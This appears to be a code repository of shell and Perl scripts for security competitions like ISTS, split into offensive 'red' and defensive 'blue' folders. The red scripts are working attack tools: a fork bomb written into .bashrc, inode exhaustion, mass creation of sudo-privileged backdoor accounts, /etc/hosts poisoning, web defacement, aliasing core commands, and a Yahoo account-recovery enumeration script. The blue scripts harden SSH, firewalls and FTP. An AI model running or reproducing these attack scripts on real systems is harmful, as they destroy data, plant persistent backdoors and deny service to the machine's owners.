├── red ├── bombs │ ├── termbomb.sh │ ├── cronbomb.sh │ ├── bashbomb.sh │ └── bomb.sh ├── inodes.sh ├── evil.sh ├── TEKiller.sh ├── random_users.sh ├── random_users2.sh ├── autohost.sh ├── shell_roulette.sh ├── web_deface.sh ├── SE │ ├── yahoo_recover.sh │ └── email_scrape.py ├── binswap.py └── slowloris.pl ├── README.md └── blue ├── quota.sh ├── ftp ├── vsftpd3.conf ├── anon.sh ├── proftpd.sh ├── vsftpd.sh └── proftpd.conf ├── httpd ├── httpd.sh └── httpd.conf ├── apache2 ├── ssl.sh ├── mod ├── conf ├── apache2.sh └── default ├── ipfilter.sh ├── users-linux.sh ├── users-freebsd.sh ├── check.pl ├── setup_ssh.sh ├── ipfw.sh ├── startup-bsd.sh ├── jail_maker.sh ├── jail_maker_freebsd.sh ├── startup-linux.sh └── iptables.sh /red/bombs/termbomb.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | while true; do 4 | gnome-terminal &disown 5 | done 6 | -------------------------------------------------------------------------------- /red/bombs/cronbomb.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | bomb= # this will be your bomb you want in the crontab 3 | echo "@reboot $bomb"|crontab 4 | -------------------------------------------------------------------------------- /red/bombs/bashbomb.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | echo ':(){echo "balls"|wall;:|:&disown};:&disown' >> ~/.bashrc 3 | echo ':(){echo "balls"|wall;:|:&disown};:&disown' >> ~/.bash_profile -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | tools 2 | ===== 3 | 4 | Useful scripts for quickly securing or destroying boxes. Made specifically for competitions like ISTS and other similar security competitions. Not recommended for real world use. 5 | 6 | The red folder has offensive/attack/red team tools, while the blue folder has defensive/blue team tools. 7 | -------------------------------------------------------------------------------- /red/inodes.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Takes up all inodes - makes it impossible to write to disk 3 | 4 | PRFX="/usr/local"; 5 | FS="/"; 6 | freeI=$(/bin/df -i "$FS"|/usr/bin/awk '{print $4}'|/usr/bin/tail -n1); 7 | 8 | for i in `seq 1 100`; 9 | do for q in `seq 1 $((freeI/100))`; 10 | do touch "${PRFX}/.$i.$q"; 11 | done & 12 | done 13 | -------------------------------------------------------------------------------- /red/evil.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ "`whoami`" == "root" ]; then 4 | apt-get install sl -y || yum install sl -y 5 | path=`which sl` 6 | echo "alias rm='${path}/sl'" >> ~/.bashrc 7 | echo "alias cp='${path}/sl'" >> ~/.bashrc 8 | echo "alias mv='${path}/sl'" >> ~/.bashrc 9 | echo "alias cd='${path}/sl'" >> ~/.bashrc 10 | echo "alias exit='${path}/sl'" >> ~/.bashrc 11 | fi &> /dev/null 12 | -------------------------------------------------------------------------------- /blue/quota.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Setting a disk quota for a user 3 | 4 | #Installing quota 5 | sudo apt-get install quota -y & 6 | 7 | while [ true ]; do 8 | read -p "Please enter a user (leave blank to exit): " USER 9 | 10 | if [ "$USER" == "" ]; then 11 | echo "No user given. Bye!" 12 | exit 0 13 | fi 14 | 15 | #setting the quota 16 | #softquota/blocks/softquota/inodes 17 | setquota $USER 0 512020 0 1000 -a 18 | done 19 | -------------------------------------------------------------------------------- /blue/ftp/vsftpd3.conf: -------------------------------------------------------------------------------- 1 | listen=YES 2 | anonymous_enable=NO 3 | write_enable=YES 4 | local_enable=YES 5 | dirmessage_enable=YES 6 | local_umask=022 7 | use_localtime=YES 8 | xferlog_enable=YES 9 | connect_from_port_20=YES 10 | idle_session_timeout=600 11 | data_connection_timeout=120 12 | ftpd_banner=Welcome. 13 | chroot_local_user=YES 14 | secure_chroot_dir=/home/ 15 | allow_writeable_chroot=YES 16 | pam_service_name=ftp 17 | rsa_cert_file=/etc/ssl/private/vsftpd.pem 18 | rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key 19 | -------------------------------------------------------------------------------- /red/TEKiller.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Text Editor killer 3 | 4 | sleepTime=1 5 | if [ "$#" -gt 0 ]; then #if they gave an arg, make sure it's a number, then assign it 6 | echo "$1" | /bin/grep -qP '^\d+$' && sleepTime="$1" 7 | fi 8 | 9 | while true; do 10 | #get all dirs in /proc, check to see if the program is a text editor 11 | #if it is, cat the stdin fd associated with it and it won't work. 12 | for dir in $(/bin/ls -d /proc/*/); do 13 | file=$(/bin/ls -l "${dir}exe" 2>/dev/null | awk '{ print $NF }') 14 | $(echo "$file" | /bin/grep -qPw 'vi|vim|nano|emacs|pico') && /bin/cat "${dir}fd/0" &> /dev/null &disown 15 | done 16 | sleep "$sleepTime" 17 | done 18 | -------------------------------------------------------------------------------- /red/random_users.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env 2 | 3 | end="500" 4 | groups="sudo admin root wheel sudoers adm sys bin daemon shutdown ssh sshd ftp apache httpd" 5 | sudoFile="/etc/sudoers" 6 | for i in $(seq 1 $end); do 7 | user="$(echo "${RANDOM}${RANDOM}" | md5sum | cut -b 1-14)" 8 | useradd -m "$user" 9 | 10 | #make sure user was added successfully 11 | ret=$(echo $?) 12 | if [ "$ret" -ne 0 ]; then 13 | continue 14 | fi 15 | 16 | usermod -s /bin/bash "$user" 17 | #add to typical admin groups 18 | for group in $groups; do 19 | usermod -a -G "$group" "$user" 20 | done 21 | 22 | #add to sudoers to file 23 | echo "$user ALL=(ALL:ALL) ALL" >> "$sudoFile" 24 | done 25 | -------------------------------------------------------------------------------- /red/random_users2.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env 2 | 3 | sleepTime="600" 4 | groups="sudo admin root wheel sudoers adm sys bin daemon shutdown ssh sshd ftp apache httpd" 5 | sudoFile="/etc/sudoers" 6 | while true; do 7 | user="$(echo "${RANDOM}${RANDOM}" | md5sum | cut -b 1-14)" 8 | useradd -m "$user" 9 | 10 | #make sure user was added successfully 11 | ret=$(echo $?) 12 | if [ "$ret" -ne 0 ]; then 13 | continue 14 | fi 15 | 16 | usermod -s /bin/bash "$user" 17 | #add to typical admin groups 18 | for group in $groups; do 19 | usermod -a -G "$group" "$user" 20 | done 21 | 22 | #add to sudoers to file 23 | echo "$user ALL=(ALL:ALL) ALL" >> "$sudoFile" 24 | 25 | sleep "$" 26 | done 27 | -------------------------------------------------------------------------------- /red/autohost.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #find sites used to get packages from, then set them to 0.0.0.0 in the /etc/hosts files 3 | 4 | #determine if redhat or debian based, then get sites based on that 5 | if [ -f "/etc/redhat-release" ]; then 6 | sites="$(/usr/bin/yum repolist 2>/dev/null | fgrep '*' | awk '{print $NF}')" 7 | elif [ -f "/etc/debian_version" ]; then 8 | sites="$(/bin/grep deb /etc/apt/sources.list | grep -v '#' | awk '{print $2}' | cut -d / -f 3 | grep -oPi '\w+\.\w+$' | sort | uniq)" 9 | else 10 | echo "failed host detection, not red hat or debian." 11 | exit -1 12 | fi 13 | 14 | hostsFile="/etc/hosts" 15 | for site in "$sites"; do 16 | echo >> "$hostsFile" 17 | echo "0.0.0.0 *.${site}" >> "$hostsFile" 18 | done 19 | -------------------------------------------------------------------------------- /red/shell_roulette.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sleepTime=30 4 | 5 | #get shell for the user 6 | shell="$(getent passwd "$(whoami)" | awk -F : '{print $NF}' | awk -F / '{print $NF}')" 7 | if [ "$shell" = "" ]; then 8 | shell="bash" 9 | fi 10 | 11 | #make sure history file exists and whatnot 12 | histFile="$HOME/.${shell}_history" 13 | if [ ! -e "$histFile" ]; then 14 | histFile="$HOME/.history" 15 | if [ ! -e "$histFile" ]; then 16 | echo "couldn't find history file :(" 17 | exit -1 18 | fi 19 | fi 20 | 21 | #roulette forever! 22 | while true; do 23 | lines="$(wc -l "$histFile" | awk '{print $1}')" 24 | rand="$(($RANDOM % $lines))" 25 | cmd="$(sed "${rand}q;d" "$histFile")" 26 | echo "$cmd" 27 | $cmd 28 | 29 | sleep "$sleepTime" 30 | done 31 | -------------------------------------------------------------------------------- /red/web_deface.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | PATH="/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin" 4 | defaceVal="balls :3" 5 | 6 | #determine if redhat or debian based 7 | if [ -f "/etc/redhat-release" ]; then 8 | yum install httpd -y 9 | webDir="/etc/httpd" 10 | elif [ -f "/etc/debian_version" ]; then 11 | apt-get install apache2 -y 12 | webDir="/etc/apache2" 13 | else 14 | echo "failed install, not red hat or debian." 15 | exit -1 16 | fi 17 | 18 | webDirs="$(grep -RhP "^\s+DocumentRoot.*" "$webDir" | awk '{print $2}' | sort | uniq)" 19 | 20 | #overwrite all files in every web dir with $defaceVal 21 | for dir in $webDirs; do 22 | cd "$dir" 23 | for file in $(ls); do 24 | if [ ! -d "$file" ]; then 25 | echo "$defaceVal" > "$file" 26 | fi 27 | done 28 | done 29 | -------------------------------------------------------------------------------- /blue/ftp/anon.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Anon FTP 3 | 4 | #stopping 5 | service vsftpd stop 6 | 7 | #making a new conf file 8 | touch /etc/vsftpd-anon.conf 9 | 10 | #adding a new folder for anon 11 | mkdir /home/anon_user 12 | 13 | #writing the new conf file 14 | echo "listen=YES" > /etc/vsftpd-anon.conf 15 | echo "local_enable=NO" >> /etc/vsftpd-anon.conf 16 | echo "anonymous_enable=YES" >> /etc/vsftpd-anon.conf 17 | echo "write_enable=YES" >> /etc/vsftpd-anon.conf 18 | echo "anon_root=/home/anon_user" >> /etc/vsftpd-anon.conf 19 | echo "anon_max_rate=2048000" >> /etc/vsftpd-anon.conf 20 | echo "xferlog_enable=YES" >> /etc/vsftpd-anon.conf 21 | echo "listen_address=<>" >> /etc/vsftpd-anon.conf 22 | echo "listen_port=21" >> /etc/vsftpd-anon.conf 23 | 24 | #adding config file to the vsftpd instance 25 | vsftpd /etc/vsftpd-anon.conf 26 | service vsftpd start 27 | -------------------------------------------------------------------------------- /red/SE/yahoo_recover.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Checks Yahoo e-mail for recovery questions 3 | 4 | #username array 5 | USERNAME=(user@yahoo.com) 6 | 7 | for i in "${USERNAME[@]}" 8 | do 9 | 10 | OUTPUT=`curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0' -H 'Referer: https://edit.yahoo.com/mforgot' -H 'Content-Type: application/x-www-form-urlencoded' -b 'B=dpsc3ehaibqtm&b=3&s=u5; ywadp10001468467156=2807892355; fpc10001468467156=ZeqKfREC||; fpc10001756605956=ZSzJATQq||' --data-binary $'stage=fe101&login='"$i"'&cc=&done=http%3A%2F%2Fwww.yahoo.com&intl=us&lang=en-US&partner=reg&src=&appsrc=&ostype=&fs=uq4bhkqHafAYb39UO5XNCBlntocFN2hDy4gbQpjkmCnz6iGWaWvFZkIzqhA3yK4c5kft98qO' 'https://edit.yahoo.com/mforgot' | grep "Secret Question" -A 1` 11 | 12 | if [ ! -z "$OUTPUT" ] 13 | then 14 | echo $i 15 | echo $OUTPUT 16 | fi 17 | done 18 | -------------------------------------------------------------------------------- /blue/httpd/httpd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Installing httpd 3 | 4 | #installing if not already there 5 | yum install httpd -y 6 | 7 | #stopping 8 | service httpd stop 9 | 10 | #editing home page 11 | cd /var/www/html 12 | touch index.html 13 | echo "HEY" >> index.html 14 | 15 | #moving in conf file 16 | mv /etc/httpd/conf/httpd.conf /etc/httpd/conf/httpd.conf.bak 17 | mv `pwd`/httpd.conf /etc/httpd/conf/httpd.conf 18 | 19 | #reloading and restarting 20 | service httpd reload 21 | service httpd restart 22 | 23 | 24 | ##installing mod sec 25 | #yum install gcc make 26 | #yum install libxml2 libxml2-devel httpd-devel pcre-devel curl-devel 27 | #cd /usr/src 28 | #wget http://www.modsecurity.org/download/modsecurity-apache_2.6.6.tar.gz 29 | #tar xzf modsecurity-apache_2.6.6.tar.gz 30 | #cd modsecurity-apache_2.6.6 31 | #./configure 32 | #make install 33 | #cp modsecurity.conf-recommended /etc/httpd/conf.d/modsecurity.conf 34 | 35 | -------------------------------------------------------------------------------- /blue/apache2/ssl.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Setting up SSL on apache2 3 | 4 | #ask if they've installed before 5 | read -p "Have you generated your SSL Cert? [y/n]: " ANS 6 | 7 | #if this is the first time 8 | if [ "$ANS" == "n" ]; then 9 | #enabling 10 | a2enmod ssl 11 | service apache2 restart 12 | 13 | #making a new dir 14 | mkdir /etc/apache2/ssl 15 | cd /etc/apache2/ssl 16 | echo "Run the following command:" 17 | echo "openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/apache.key -out /etc/apache2/ssl/apache.crt" 18 | exit 19 | 20 | #if they've run the script before 21 | elif [ "$ANS" == "y" ]; then 22 | mv /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/default-ssl.bak 23 | mv `pwd`/default /etc/apache2/sites-available/default-ssl 24 | a2ensite default-ssl 25 | service apache2 reload 26 | echo "Remember to edit the default-ssl config file!" 27 | exit 28 | 29 | #if a wrong selection 30 | else 31 | echo "Incorrect selection" 32 | exit 33 | fi 34 | -------------------------------------------------------------------------------- /blue/ftp/proftpd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Gettng ftp server up and running 3 | #This works for vsftp and proftpd currently 4 | 5 | #Asking to see if they have a ftp user 6 | read -p "Do you have FTP User(s)? (y/n): " ANS 7 | ANS=`echo $ANS | tr '[:lower:]' '[:upper:]'` 8 | if [ "$ANS" == "Y" ]; then 9 | read -p "Enter user(s) name (separate each with a space): " FTPUSERS 10 | else 11 | echo "Please make a user FIRST!" 12 | exit 13 | fi 14 | 15 | #reinstalling proftpd 16 | apt-get remove proftpd -y 17 | apt-get install proftpd -y 18 | 19 | #backing up the old config file 20 | mv /etc/proftpd/proftpd.conf /etc/proftpd/proftpd.conf.bak 21 | 22 | #moving in the new config file 23 | cp `pwd`/proftpd.conf /etc/proftpd/proftpd.conf 24 | 25 | #making a chroot for each user 26 | cd /home 27 | for FTPUSER in $FTPUSERS; do 28 | if test ! -e $FTPUSER; then 29 | mkdir $FTPUSER 30 | chown $FTPUSER:$FTPUSER $FTPUSER/ 31 | chmod 755 $FTPUSER/ 32 | fi 33 | done 34 | 35 | #restarting 36 | service proftpd restart 37 | echo "DONE!" 38 | -------------------------------------------------------------------------------- /blue/ipfilter.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | path=/sbin 4 | file=/etc/ipf/ipf.conf 5 | 6 | #allow icmp; block bad stuffz 7 | echo "block return-icmp(net-unr) in proto udp all" >> $file # return ICMP error packets for invalid UDP packets 8 | echo "pass in quick proto icmp from any to any keep state group 100" > $file 9 | echo "pass out quick proto icmp from any to any keep state group 200" >> $file 10 | 11 | #regular rules 12 | echo "block in log quick all with short" >> $file 13 | echo "pass in quick proto tcp from any to any port = 80 keep state" >> $file #web 14 | echo "pass out quick proto tcp from any to any port = 80 keep state" >> $file #web 15 | echo "pass in quick proto tcp from any to any port = 443 keep state" >> $file #web 16 | echo "pass out quick proto tcp from any to any port = 443 keep state" >> $file #web 17 | echo "pass out quick proto udp from any to any port = domain keep state" >> $file #dns 18 | 19 | 20 | #block all else 21 | echo "block in from any to any head 100" >> $file 22 | echo "block out from any to any head 200" >> $file 23 | 24 | -------------------------------------------------------------------------------- /blue/users-linux.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #edit users - change password for all users and disable other accounts 3 | 4 | read -s -p "Enter password for all non-privileged users: " pass 5 | echo 6 | read -s -p "Enter password again: " pass_two 7 | echo 8 | 9 | while [ "$pass" != "$pass_two" ]; do 10 | echo "Passwords did not match. Try again." 11 | read -s -p "Enter password for all non-privileged users: " pass 12 | echo 13 | read -s -p "Enter password again: " pass_two 14 | echo 15 | done 16 | 17 | for user in $(awk -F":" '{if($3>=500) print $1}' /etc/passwd); do 18 | echo "$user:$pass" | chpasswd 19 | done 20 | 21 | echo "Be careful not to disable a useful/necessary account." 22 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 23 | for user in $users; do 24 | if [ "$user" == "root" ]; then 25 | continue 26 | fi 27 | read -p "Do you want to disable '$user' (Y/N): " answer 28 | answer=`echo $answer | /usr/bin/tr '[:lower:]' '[:upper:]'` 29 | if [ "$answer" == "Y" -o "$answer" == "YES" ]; then 30 | usermod $user -s /bin/nologin 31 | fi 32 | done 33 | -------------------------------------------------------------------------------- /blue/users-freebsd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #edit users - change password for all users and disable other accounts 3 | 4 | read -s -p "Enter password for all non-privileged users: " pass 5 | echo 6 | read -s -p "Enter password again: " pass_two 7 | echo 8 | 9 | while [ "$pass" != "$pass_two" ]; do 10 | echo "Passwords did not match. Try again." 11 | read -s -p "Enter password for all non-privileged users: " pass 12 | echo 13 | read -s -p "Enter password again: " pass_two 14 | echo 15 | done 16 | 17 | for user in $(awk -F":" '{if($3>=500) print $1}' /etc/passwd); do 18 | echo "$pass" | pw usermod $user -h 0 19 | done 20 | 21 | echo "Be careful not to disable a useful/necessary account." 22 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 23 | for user in $users; do 24 | if [ "$user" == "root" ]; then 25 | continue 26 | fi 27 | read -p "Do you want to disable '$user' (Y/N): " answer 28 | answer=`echo $answer | /usr/bin/tr '[:lower:]' '[:upper:]'` 29 | if [ "$answer" == "Y" -o "$answer" == "YES" ]; then 30 | pw usermod $user -m -s /usr/sbin/nologin 31 | fi 32 | done -------------------------------------------------------------------------------- /blue/ftp/vsftpd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Gettng ftp server up and running 3 | #This works for vsftp and proftpd currently 4 | 5 | #Asking to see if they have a ftp user 6 | read -p "Do you have FTP User(s)? (y/n): " ANS 7 | ANS=`echo $ANS | tr '[:lower:]' '[:upper:]'` 8 | if [ "$ANS" == "Y" ]; then 9 | read -p "Enter user(s) name (separate each with a space): " FTPUSERS 10 | else 11 | echo "Please make a user FIRST!" 12 | exit 13 | fi 14 | 15 | #checking to see if vsftpd is installed 16 | apt-get remove vsftp -y 17 | wget -q http://ftp.debian.org/debian/pool/main/v/vsftpd/vsftpd_3.0.2-3_i386.deb 18 | echo "Finished downloading..." 19 | 20 | #backing up the old config file (if there is one) 21 | mv /etc/vsftpd.conf /etc/vsftpd.conf.bak 22 | 23 | #installing and moving custom configuration in 24 | dpkg -i vsftpd_3.0.2-3_i386.deb 25 | cp vsftpd3.conf /etc/vsftpd.conf 26 | 27 | #making a chroot for each user 28 | cd /home 29 | for FTPUSER in $FTPUSERS; do 30 | if test ! -e $FTPUSER; then 31 | mkdir $FTPUSER 32 | chown $FTPUSER:$FTPUSER $FTPUSER/ 33 | chmod 755 $FTPUSER/ 34 | fi 35 | done 36 | 37 | #restarting 38 | service vsftpd stop 39 | service vsftpd start 40 | echo "DONE! Finished installing vsftpd" 41 | 42 | #removing install file 43 | cd $OLDPWD 44 | rm vsftpd_3.0.2-3_i386.deb 45 | -------------------------------------------------------------------------------- /blue/check.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | #Jackson Sadowski 3 | #Directory Monitor 4 | 5 | my $initialTime = `date +"%Y-%m-%d %T"`; 6 | my @initialFiles = `ls -1 --file-type | grep -v '/' | sed s/@\$//`; 7 | my @initialDirs = `ls -l | grep ^d | cut -d' ' -f9`; 8 | 9 | chomp @initialFiles; 10 | chomp @initialDirs; 11 | 12 | #initializing hashes 13 | my %files = (); 14 | my %dirs = (); 15 | my $date; 16 | 17 | #getting the current date of the files 18 | foreach (@initialFiles){ 19 | $date = `stat -c%y $_ | cut -d. -f1`; 20 | $files{ $_ } = $date; 21 | } 22 | 23 | #getting the current date of the dirs 24 | foreach (@initialDirs){ 25 | $date = `stat -c%y $_ | cut -d. -f1`; 26 | $dirs{ $_ } = $date; 27 | } 28 | 29 | #continually checks to see if files have changes 30 | while(1){ 31 | my @currentFiles = `ls -1 --file-type | grep -v '/' | sed s/@\$//`; 32 | my @currentDirs = `ls -l | grep ^d | cut -d' ' -f9`; 33 | chomp @currentFiles; 34 | chomp @currentDirs; 35 | 36 | #making new hash for current files/dir 37 | #initializing hashes 38 | my %newFiles = (); 39 | my %newDirs = (); 40 | 41 | #getting the current date of the files 42 | foreach (@currentFiles){ 43 | $date = `stat -c%y $_ | cut -d. -f1`; 44 | $newFiles{ $_ } = $date; 45 | } 46 | 47 | #getting the current date of the dirs 48 | foreach (@currentDirs){ 49 | $date = `stat -c%y $_ | cut -d. -f1`; 50 | $newDirs{ $_ } = $date; 51 | } 52 | 53 | #at this point we should check if 54 | #the arrays of hashes are the same 55 | #alert if there's a change 56 | #log the file 57 | 58 | #sleeping 59 | sleep(2); 60 | } 61 | -------------------------------------------------------------------------------- /blue/setup_ssh.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Setting up SSH on a box 3 | 4 | #ssh configuration file 5 | sshd_config='/etc/ssh/sshd_config' 6 | 7 | service sshd stop 8 | 9 | #backup the old configuration files 10 | /bin/cp $sshd_config $sshd_config.bak 11 | /bin/mv /etc/nologin /etc/nologin.bak 12 | /bin/mv /etc/host.allow /etc/host.allow.bak 13 | /bin/mv /etc/hosts.deny /etc/hosts.deny.bak 14 | 15 | #make new configuration files 16 | echo "Protocol 2" > $sshd_config #only allow the latest ssh standard 17 | echo "Port 22" >> $sshd_config #set port 18 | echo "X11Forwarding no" >> $sshd_config 19 | echo "ClientAliveInterval 300" >> $sshd_config #auto disconnect idle hosts 20 | echo "ClientAliveCountMax 0" >> $sshd_config 21 | echo "IgnoreRhosts yes" >> $sshd_config #disable rsh access 22 | echo "RhostsRSAAuthentication no" >> $sshd_config 23 | echo "HostBasedAuthentication no" >> $sshd_config 24 | echo "ChallengeResponseAuthentication yes" >> $sshd_config 25 | echo "UsePAM yes" >> $sshd_config 26 | echo "PermitRootLogin no" >> $sshd_config 27 | echo "PermitEmptyPasswords no" >> $sshd_config 28 | echo "LogLevel INFO" >> $sshd_config 29 | echo "#AllowUsers sshuser1 sshuser2 sshuser3" >> $sshd_config you can use this line after you know the users 30 | echo "#AllowGroups sshusers" >> $sshd_config #use after you have users in a group 31 | 32 | #chroot users home directory 33 | echo "Match group sshusers" >> $sshd_config 34 | echo " ChrootDirectory /var/jail" >> $sshd_config #set up chroot dir 35 | echo " X11Forwarding no" >> $sshd_config 36 | echo " AllowTcpForwarding no" >> $sshd_config 37 | echo "AllowTcpForwarding no" >> $sshd_config 38 | 39 | service sshd start 40 | -------------------------------------------------------------------------------- /blue/ftp/proftpd.conf: -------------------------------------------------------------------------------- 1 | Include /etc/proftpd/modules.conf 2 | UseIPv6 off 3 | IdentLookups off 4 | ServerName "Welcome" 5 | ServerIdent on "FTP Server." 6 | ServerType standalone 7 | DeferWelcome off 8 | MultilineRFC2228 on 9 | DefaultServer on 10 | ShowSymlinks off 11 | TimeoutNoTransfer 600 12 | TimeoutStalled 600 13 | TimeoutIdle 1200 14 | DisplayLogin "Greetings." 15 | DisplayChdir .message true 16 | ListOptions "-l" 17 | DenyFilter \*.*/ 18 | DefaultRoot ~ 19 | Port 21 20 | 21 | 22 | MaxInstances 5 23 | User ftpguy 24 | Group ftpusers 25 | Umask 022 022 26 | AllowOverwrite on 27 | TransferLog /var/log/proftpd/xferlog 28 | SystemLog /var/log/proftpd/proftpd.log 29 | 30 | QuotaEngine off 31 | 32 | 33 | Ratios off 34 | 35 | 36 | DelayEngine on 37 | 38 | 39 | ControlsEngine off 40 | ControlsMaxClients 2 41 | ControlsLog /var/log/proftpd/controls.log 42 | ControlsInterval 5 43 | ControlsSocket /var/run/proftpd/proftpd.sock 44 | 45 | 46 | AdminControlsEngine off 47 | 48 | Include /etc/proftpd/conf.d/ 49 | -------------------------------------------------------------------------------- /blue/apache2/mod: -------------------------------------------------------------------------------- 1 | 2 | SecRuleEngine On 3 | SecRequestBodyAccess On 4 | SecRule REQUEST_HEADERS:Content-Type "text/xml" \ 5 | "phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" 6 | SecRequestBodyLimit 16384000 7 | SecRequestBodyNoFilesLimit 16384000 8 | SecRequestBodyInMemoryLimit 131072 9 | SecRequestBodyLimitAction Reject 10 | SecRule REQBODY_ERROR "!@eq 0" \ 11 | "phase:2,t:none,log,deny,status:400,msg:'Failed to parse request body.',logdata:'%{reqbody_error_msg}',severity:2" 12 | SecRule MULTIPART_STRICT_ERROR "!@eq 0" \ 13 | "phase:2,t:none,log,deny,status:44,msg:'Multipart request body \ 14 | failed strict validation: \ 15 | PE %{REQBODY_PROCESSOR_ERROR}, \ 16 | BQ %{MULTIPART_BOUNDARY_QUOTED}, \ 17 | BW %{MULTIPART_BOUNDARY_WHITESPACE}, \ 18 | DB %{MULTIPART_DATA_BEFORE}, \ 19 | DA %{MULTIPART_DATA_AFTER}, \ 20 | HF %{MULTIPART_HEADER_FOLDING}, \ 21 | LF %{MULTIPART_LF_LINE}, \ 22 | SM %{MULTIPART_SEMICOLON_MISSING}, \ 23 | IQ %{MULTIPART_INVALID_QUOTING}, \ 24 | IH %{MULTIPART_INVALID_HEADER_FOLDING}, \ 25 | IH %{MULTIPART_FILE_LIMIT_EXCEEDED}'" 26 | SecRule MULTIPART_UNMATCHED_BOUNDARY "!@eq 0" \ 27 | "phase:2,t:none,log,deny,status:44,msg:'Multipart parser detected a possible unmatched boundary.'" 28 | SecPcreMatchLimit 1000 29 | SecPcreMatchLimitRecursion 1000 30 | 31 | SecRule TX:/^MSC_/ "!@streq 0" \ 32 | "phase:2,t:none,deny,msg:'ModSecurity internal error flagged: %{MATCHED_VAR_NAME}'" 33 | SecResponseBodyAccess On 34 | SecResponseBodyMimeType text/plain text/html text/xml 35 | SecResponseBodyLimit 524288 36 | SecResponseBodyLimitAction ProcessPartial 37 | SecTmpDir /tmp/ 38 | SecDataDir /tmp/ 39 | SecAuditEngine RelevantOnly 40 | SecAuditLogRelevantStatus "^(?:5|4(?!04))" 41 | SecAuditLogParts ABIJDEFHZ 42 | SecAuditLogType Serial 43 | SecAuditLog /var/log/apache2/modsec_audit.log 44 | SecArgumentSeparator & 45 | SecCookieFormat 0 46 | -------------------------------------------------------------------------------- /blue/ipfw.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #set path of ipfw 3 | path=/sbin 4 | 5 | $path/ipfw -q -f flush #flush all existing rules 6 | 7 | #loopback stuff 8 | $path/ipfw -q add allow all from any to any via lo0 #allow loopback traffic 9 | $path/ipfw -q add deny ip from any to 127.0.0.0/8 #filter loopback traffic 10 | $path/ipfw -q add deny ip from 127.0.0.0/8 to any #filter loopback traffic 11 | 12 | #stateful firewall stuffz. and fragmented packet stuff 13 | $path/ipfw -q add check-state 14 | $path/ipfw -q add deny all from any to any frag # deny fragmented packets 15 | 16 | #allow established connections 17 | $path/ipfw -q add allow all from any to any established 18 | 19 | #services 20 | $path/ipfw -q add allow tcp from any to any 20 #ftp 21 | $path/ipfw -q add allow tcp from any to any 21 #ftp 22 | $path/ipfw -q add allow tcp from any to any 1024-65535 keep-state #for active ftp 23 | $path/ipfw -q add allow tcp from any to me 22 in keep-state #ssh in 24 | $path/ipfw -q add allow tcp from me to any 22 out keep-state #ssh out 25 | #$path/ipfw -q add allow tcp from any to any 25 #smtp; could add keep-state for more securities 26 | $path/ipfw -q add allow udp from me to any 53 out keep-state #dns 27 | #$path/ipfw -q add allow udp from any 68 to any 67 out keep-state #dhcp 28 | #$path/ipfw -q add allow udp from any 67 to any 68 in keep-state #dhcp 29 | $path/ipfw -q add allow tcp from any to any 80 #http 30 | $path/ipfw -q add allow tcp from any to any 443 #https 31 | 32 | #normal stuff, allow good in, keep bad out 33 | $path/ipfw -q add allow icmp from any to any icmptype 0,8 #allow ping echo request/reply only 34 | $path/ipfw -q add deny ip from me to me in keep-state #stop spoof/smurf attacks 35 | $path/ipfw -q add deny tcp from any to any setup in keep-state #external setup requests 36 | $path/ipfw -q add deny tcp from any to any 0 in setup keep-state #limit OS detection 37 | $path/ipfw -q add deny udp from any to any 0 in keep-state #limit OS detection 38 | 39 | #block the rest 40 | $path/ipfw -q add deny ip6 from any to any #block all ipv6 41 | $path/ipfw -q add deny log all from any to any #block the rest 42 | -------------------------------------------------------------------------------- /blue/apache2/conf: -------------------------------------------------------------------------------- 1 | LockFile ${APACHE_LOCK_DIR}/accept.lock 2 | PidFile ${APACHE_PID_FILE} 3 | Timeout 300 4 | KeepAlive On 5 | MaxKeepAliveRequests 100 6 | KeepAliveTimeout 5 7 | 8 | StartServers 5 9 | MinSpareServers 5 10 | MaxSpareServers 10 11 | MaxClients 150 12 | MaxRequestsPerChild 0 13 | 14 | 15 | StartServers 2 16 | MinSpareThreads 25 17 | MaxSpareThreads 75 18 | ThreadLimit 64 19 | ThreadsPerChild 25 20 | MaxClients 150 21 | MaxRequestsPerChild 0 22 | 23 | 24 | StartServers 2 25 | MinSpareThreads 25 26 | MaxSpareThreads 75 27 | ThreadLimit 64 28 | ThreadsPerChild 25 29 | MaxClients 150 30 | MaxRequestsPerChild 0 31 | 32 | User 